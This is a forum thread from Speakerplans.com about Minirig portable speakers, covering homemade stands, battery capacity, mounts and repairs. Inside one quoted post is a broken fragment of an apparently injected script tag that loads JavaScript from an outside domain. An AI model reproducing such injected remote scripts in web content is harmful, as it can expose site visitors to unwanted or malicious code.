Speakerplans.com Homepage
Forum Home Forum Home > General > 12v Powered Systems
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Minirig

Post Reply Post Reply Page  <1 76777879>
Author

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2019 at 10:18pm
Originally posted by Joji Joji wrote:

I have not seen commercial speaker stands for the miniRigs, but YouTuber clavinetJunkie made some DIY. It looked like he used some plastic lids and cut out "seats". Another member of this site also made DIY stands so that the speakers were securely held on a bicycle. Personally, I use the cloth casing that the miniRigs come in. The snug fit of the casing is rigid enough to tilt and hold the speakers at an angle from 0 degrees (flat) to 60-70 degrees incline, while resting on the desk. Maybe because I am too lazy, but this is just fine for my needs. Mostly I listen while seated about a meter from the speakers, so this range works for me. I think that a vertical inclination at ear height might be better for larger stereo sound stages. If this is what you seek, just make sure there is no rattling to spoil the fine sound.< ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">

Domo!

I too have been thinking that re-purposing some plastic lids or something will be a good start. Cutting a notch so that they stay at the correct angle would be the main "design element."

The YouTuber OLUV (that does tons of speaker reviews) has a set of simple stands that I have seen around the web. I think they were 3-D Printed. But the simple design should be easy to replicate by using scrounged pieces of plastic.

EDIT: Oh, I guess Clavinetjunkie and Oluv are one in the same. :) 

(When camping--and that is what I love portable sound for--I have tucked the speakers into rock ledges and/or used some fabric to prop them up but the former tends to make it easier to scrape the speakers up and the latter tends to not keep the speakers steady enough.) 

Edited by Stereonerd - 24 June 2019 at 10:22pm
ms1012 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote ms1012 Quote  Post ReplyReply Direct Link To This Post Posted: 01 July 2019 at 11:09pm
Originally posted by Stereonerd Stereonerd wrote:

New Question:

I am sure this has been discussed here before but I didn't see anything on speaker stands when I poked about. Has anyone discovered a lightweight set of stands that tip the MiniRigs at an angle (And are also actually available and not too expensive)? 

Again, Thank you Matt and Joji!

There's an ebay user called mkstands who makes some metal stands for the minirigs (various models / combinations available).  For example: https://ebay.us/7S7rAx

Edited by ms1012 - 01 July 2019 at 11:14pm
Stereonerd View Drop Down

Post Options Post Options   Thanks (1) Thanks(1)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 01 July 2019 at 11:18pm
Thank you!
( https://mkstands.com/product-category/minirig-stands/ - https://mkstands.com/product-category/minirig-stands/)

If one wants metal stands to hang from a wall, he is your guy.

I backpack all my stuff for miles and there are no walls in the mountains. So I am after something extremely light and designed to sit on the floor/ground that simply aims the speakers at a 45 degree angle. (Keeping them on the ground helps maximize bass response.)

So far, cutting up a cottage cheese container is the solution. Light. Cheap. Functional.

But I'd still like something designed to fit that description. 

Edited by Stereonerd - 01 July 2019 at 11:31pm
Stereonerd View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stereonerd Quote  Post ReplyReply Direct Link To This Post Posted: 08 July 2019 at 6:09pm
Oh my!
My second V2 sub arrived a week or so after my new V3 speakers.

Unbelievable!

What an amazing sound the 2.2 system delivers. I only played a few songs but was stunned with the power of this system. The stereo imaging was very detailed.

I look forward to fiddling with finding the perfect arrangement of the speakers...distance between the main speakers, location of subs, etc.
qwerty View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote qwerty Quote  Post ReplyReply Direct Link To This Post Posted: 26 January 2020 at 12:57pm
Can't find any info anywhere about the battery. How much mAh are they supposed to have? Even the tech specs don't mention this and I need the info. 
number1barber View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote number1barber Quote  Post ReplyReply Direct Link To This Post Posted: 05 August 2020 at 8:53pm
I saw a minirig in cash converters but the bluetooth wasnt working so got it for £30 instead of £80 not bad at all. Its green. i thought it was a 3 but it doesnt say 3 on the base so i assume its a 2

I wanted to build a motorbike mount. Because the speaker is wider than most i didnt think i could find a speaker mount that will fit it. I just found this and its exactly the same length as the minrig
https:// http://www.ebay.co.uk/itm/373084123143
It straps down and has a silicone bit that the speaker sits on. It also has a gap that allows you to face the ports down only thing is the base might need drilling to prevent it filling up with water. you could also screw on end plates to stop the speaker moving but i doubt it will and the ports might hit the base and prevent this anyway. A strip of thin plastic on the top would give the rig a awning front and back preventing rain getting near it or i could just slide it inside a tube but that means fixing it in the tube somehow

Does anyone have the 2 and the 3 is the 3 worth getting because im listening to the two right now and it sounds amazing

Edited by number1barber - 05 August 2020 at 10:17pm

Post Options Post Options   Thanks (0) Thanks(0)   Quote number1barber Quote  Post ReplyReply Direct Link To This Post Posted: 10 August 2020 at 4:14am
I would be interested in installing the speaker in a box and change the battery to something much bigger. The battery in mine is 11.1v 1500mah but weirdly they look alot bigger online. Not sure if its a li_ion or li-poly if anyone knows please say. Would like to swap it to a 5000mah
eshroom View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote eshroom Quote  Post ReplyReply Direct Link To This Post Posted: 26 August 2020 at 12:27am
Originally posted by number1barber number1barber wrote:

I saw a minirig in cash converters but the bluetooth wasnt working so got it for £30 instead of £80 not bad at all. Its green. i thought it was a 3 but it doesnt say 3 on the base so i assume its a 2

I wanted to build a motorbike mount. Because the speaker is wider than most i didnt think i could find a speaker mount that will fit it. I just found this and its exactly the same length as the minrig
https:// http://www.ebay.co.uk/itm/373084123143
It straps down and has a silicone bit that the speaker sits on. It also has a gap that allows you to face the ports down only thing is the base might need drilling to prevent it filling up with water. you could also screw on end plates to stop the speaker moving but i doubt it will and the ports might hit the base and prevent this anyway. A strip of thin plastic on the top would give the rig a awning front and back preventing rain getting near it or i could just slide it inside a tube but that means fixing it in the tube somehow

Does anyone have the 2 and the 3 is the 3 worth getting because im listening to the two right now and it sounds amazing

Minirig fix these at cost price. Max repair cost of £40. Difference between 2-3 isn't worth the upgrade - both are excellent. I don't know if any of my friends origin minirigs failing, but several 2s have gone in for repair. Hopefully 3 is more reliable.
Matt6789 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Matt6789 Quote  Post ReplyReply Direct Link To This Post Posted: 12 September 2020 at 3:35pm
I just had someone pour Creme Soda INTO my Sub 3, is there any point in disassembling it? I don't want to damage anything in the process, but I live in South Africa so I can't really just send it in to be repaired.
Any ideas would be appreciated.
Matt6789 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Matt6789 Quote  Post ReplyReply Direct Link To This Post Posted: 15 October 2020 at 2:05pm
Do you have any tips on taking apart the sub? Can I simply pull out the two inner parts through either end? Or do I need to remove cables first or something?

Post Options Post Options   Thanks (0) Thanks(0)   Quote number1barber Quote  Post ReplyReply Direct Link To This Post Posted: 16 October 2020 at 8:03pm
Having pulled apart a minirig one to a degree from what i remember you remove the bolts an split it but it might be hard to do if there is double sided tape on the battery so you have to take your time. the main issue is the ports. I beleive they are on a plug and hopefully you can unplug them if not you would need to take a picture and usolder the cables.

What is it your trying to acheive? if you want to make sure its dried out split it as much as you can and carefully push tissue it to dry it with something not metalic. you could also fill it full of dry rice and then put it in another container and cover it with more rice for a coupe of days
Matt6789 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Matt6789 Quote  Post ReplyReply Direct Link To This Post Posted: 17 October 2020 at 8:40am
Hmm, the more I think about it the more I realize it might be a stupid idea. I've just got a reply back from support where they confirmed even if it's not under warranty, they can offer a repair/battery replacement for a max of £40. The sub actually works totally fine, except the battery won't charge past 40/50%, so I was thinking of opening it up and seeing if there's anything obviously wrong. 

Thanks a ton for your help - if I'm feeling confident I'll open it upLOL
 Post Reply Post Reply Page  <1 76777879>